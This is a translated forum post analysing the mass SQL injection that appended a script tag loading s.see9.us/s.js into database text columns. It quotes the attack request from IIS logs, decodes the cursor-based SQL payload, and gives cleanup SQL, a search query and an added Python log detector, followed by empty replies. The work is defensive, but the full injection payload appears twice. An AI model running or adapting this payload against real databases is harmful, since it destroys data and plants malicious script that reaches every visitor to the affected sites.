
Analysis of the src=http://s.see9.us/s.js> (or 3b3.org) injection attack and a discussion of fixes: approaches

2012-01-29 

author: perfectaction
date: 2009.05

Since last year, many websites have found strings such as "></title><script src=http://s.see9.us/s.js>< or 3b3.org appended to the end of the contents of text, ntext, varchar and nvarchar columns in their database tables.

I ran into it too. Going through the IIS logs and searching for "Update%20", I found many entries, for example:
2008-**-** 00:17:54 59.39.69.146 - W3SVC1 80 GET show.asp id=8826;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20select%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20where%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('Update%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 302 0 HTTP/1.1 211.68.23.76 Mozilla/4.0 - -

After decoding, that code reads as follows:

SQL code
-- the cursor walks every text/ntext/nvarchar/varchar column of every user table
-- (xtype 35 = text, 99 = ntext, 167 = varchar, 231 = nvarchar)
declare @t varchar(255), @c varchar(255)
declare table_cursor cursor for
  select a.name, b.name
  from sysobjects a, syscolumns b
  where a.id = b.id and a.xtype = 'u'
    and (b.xtype = 99 or b.xtype = 35 or b.xtype = 231 or b.xtype = 167)
open table_cursor
fetch next from table_cursor into @t, @c
while (@@fetch_status = 0)
begin
  -- shown as print here; the attacker's version runs exec on this string
  print('update [' + @t + '] set [' + @c + ']=rtrim(convert(varchar,[' + @c + '])) + cast(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D as varchar(67))')
  fetch next from table_cursor into @t, @c
end
close table_cursor
deallocate table_cursor;

In fact, the print above is exec in the original. The technique is to walk every character-type column of every table and update its content, appending the attacker's string.
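As an added example (not part of the original post), here is a small Python detector that does the IIS log search described above in a way the %20-encoded, mixed-case query cannot dodge: it URL-decodes the cs-uri-query field of each W3C log line, lower-cases it, looks for the declare/cursor/sysobjects/exec/update combination, and decodes any 0x... literal to show the string being appended. The log lines and IP addresses are constructed for the example.

```python
import re
from urllib.parse import unquote

# Fragments that, taken together, identify the cursor-driven mass-update payload
# analysed in this post. Matching runs on the URL-decoded, lower-cased query, so
# %20 / %2b encoding and the mIxEd-CaSe keywords the attacker used do not matter.
INDICATORS = ("declare", "cursor", "sysobjects", "syscolumns", "exec(", "update")
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2})+)")

def decode_hex_literals(sql):
    """Return the strings hidden in 0x... literals, i.e. what cast(0x... as varchar) appends."""
    return [bytes.fromhex(m.group(1)).decode("latin-1") for m in HEX_LITERAL.finditer(sql)]

def inspect_line(line):
    """Parse one IIS W3C log line (default field order); return a finding dict or None."""
    fields = line.split()
    if line.startswith("#") or len(fields) < 13:   # directive lines / truncated rows
        return None
    # fields: date time s-ip cs-username s-sitename s-port cs-method cs-uri-stem
    #         cs-uri-query sc-status sc-bytes cs-version c-ip cs(User-Agent) ...
    query = unquote(fields[8]).lower()
    hits = [ind for ind in INDICATORS if ind in query]
    if len(hits) < 3:          # a lone "update" typed into a search box is not an attack
        return None
    return {"when": f"{fields[0]} {fields[1]}", "client_ip": fields[12],
            "uri_stem": fields[7], "indicators": hits,
            "injected_strings": decode_hex_literals(query)}

def scan_log(text):
    return [f for f in (inspect_line(l) for l in text.splitlines()) if f]

# Constructed sample log (documentation IP ranges, not a real server): line 1 carries
# the payload from this post, lines 2 and 3 are ordinary requests.
SAMPLE_LOG = """\
2008-01-01 00:17:54 192.0.2.10 - W3SVC1 80 GET show.asp id=8826;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20select%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20where%20a.iD=b.iD%20oPeN%20tAbLe_cursoR%20exec('Update%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20cLoSe%20tAbLe_cursoR;-- 302 0 HTTP/1.1 198.51.100.7 Mozilla/4.0 - -
2008-01-01 00:18:02 192.0.2.10 - W3SVC1 80 GET show.asp id=8826 200 0 HTTP/1.1 198.51.100.8 Mozilla/4.0 - -
2008-01-01 00:18:09 192.0.2.10 - W3SVC1 80 GET search.asp q=update%20notes 200 0 HTTP/1.1 198.51.100.9 Mozilla/4.0 - -
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["when"], f["client_ip"], f["uri_stem"], f["indicators"], f["injected_strings"])
```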

Conversely, the same code can be used to strip those strings out again:
SQL code
declare @t varchar(255), @c varchar(255)
declare table_cursor cursor for
  select a.name, b.name
  from sysobjects a, syscolumns b
  where a.id = b.id and a.xtype = 'u'
    and (b.xtype = 99 or b.xtype = 35 or b.xtype = 231 or b.xtype = 167)
declare @str varchar(500)
-- put the string you want to remove here
set @str = '"></title><script src=http://s.see9.us/s.js></script><!--'
open table_cursor
fetch next from table_cursor into @t, @c
while (@@fetch_status = 0)
begin
  exec('update [' + @t + '] set [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),''' + @str + ''','''')')
  fetch next from table_cursor into @t, @c
end
close table_cursor
deallocate table_cursor;

But in reality, when the attacker updates a column it first truncates the value and then appends its own string, so for text/ntext columns whose original content was longer than 8000 characters the data can no longer be fully restored to its original state.


Often we also need to check whether other databases were hit the same way; I wrote the following for that:
SQL code
-- find which tables and which columns contain a given string:
declare @searchstr nvarchar(500)
set @searchstr = '3b3.org' -- the string you want to search for
declare @t varchar(255), @c varchar(255)
create table # (name varchar(256), cols varchar(4000))
declare table_cursor cursor for
  select a.name, b.name
  from sysobjects a, syscolumns b, systypes c
  where a.id = b.id and a.xtype = 'u' and b.xtype = c.xtype
    and c.name in ('char', 'nchar', 'varchar', 'nvarchar', 'text', 'ntext')
open table_cursor
fetch next from table_cursor into @t, @c
while (@@fetch_status = 0)
begin
  exec('
    set nocount on
    if exists(select top 1 1 from [' + @t + '] where cast([' + @c + '] as varchar(8000)) like ''%' + @searchstr + '%'')
    begin
      if not exists(select 1 from # where name=''' + @t + ''')
        insert into # select ''' + @t + ''',''' + @c + '''
      else
        update # set cols=cols+'',' + @c + ''' where name=''' + @t + '''
      --select ' + @c + ' from [' + @t + '] where [' + @c + '] like ''%' + @searchstr + '%''
    end
  ')
  fetch next from table_cursor into @t, @c
end
close table_cursor
deallocate table_cursor;
select name as '表名', cols as '列名' from #
drop table #


This SQL finds which tables and which columns contain a given string.


I suspect this kind of SQL injection attack is carried out by some tool, or what you might call a virus, but I have never seen it; if any friend has it, I hope you can send me a copy, thanks.





[Solution]
Bump~~
[Solution]
Bump 2~~
[Solution]
Learning
[Solution]
Learning~~
[Solution]
Bump
[Solution]
.
[Solution]
Learning
[Solution]

[Solution]

[Solution]
You're all experts
[Solution]
Learned something. www.tg68.cn is a site I built, hope everyone can give me some suggestions
[Solution]
Bump 16~~
[Solution]
Taking a look
[Solution]
Bump, go on

[Solution]
Good post, good post..
[Solution]
You're all experts
[Solution]
MM Dashu, doesn't Shuiwa have a special topic on injection? Is there nothing about this on there?
[Solution]
take a look
